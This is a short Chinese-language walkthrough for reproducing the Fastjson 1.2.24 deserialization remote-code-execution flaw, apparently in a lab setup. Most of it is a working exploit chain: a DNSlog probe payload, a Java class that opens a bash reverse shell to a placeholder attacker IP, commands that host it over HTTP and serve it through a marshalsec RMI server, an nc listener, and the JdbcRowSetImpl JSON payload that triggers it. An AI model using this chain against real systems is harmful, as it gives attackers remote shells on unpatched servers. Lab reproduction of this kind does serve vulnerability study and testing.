0x01 漏洞概述

0x02 漏洞版本

  1. Fastjson <=1.2.24

0x03 漏洞复现

  1. fastjson/1.2.24-rce

POC

请求头改为POST,添加下面的Payload

  1. {"naraku":{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}}

EXP

  1. https://github.com/CaijiOrz/fastjson-1.2.47-RCE

修改Exploit.java文件中的反弹shell代码

  1. public class Exploit {
  2.     public Exploit(){
  3.         try{
  4.             Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/攻击者IP/22255 0>&1");
  5.         }catch(Exception e){
  6.             e.printStackTrace();
  7.         }
  8.     }
  9.     public static void main(String[] argv){
  10.         Exploit e = new Exploit();
  11.     }
  12. }

!记得javac编译java文件

  1. javac Exploit.java

搭建一个简易的WEB服务器

  1. python3 -m http.server 55561

使用marshalsec启动RMI服务

  1. java cp marshalsec0.0.3SNAPSHOTall.jar marshalsec.jndi.RMIRefServer http://VPS服务器:55561/#Exploit 55562

攻击者主机监听反弹Shell

  1. nc -lvnp

Burp请求EXP服务器

  1. {"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://VPS服务器:55562/Exploit","autoCommit":true}}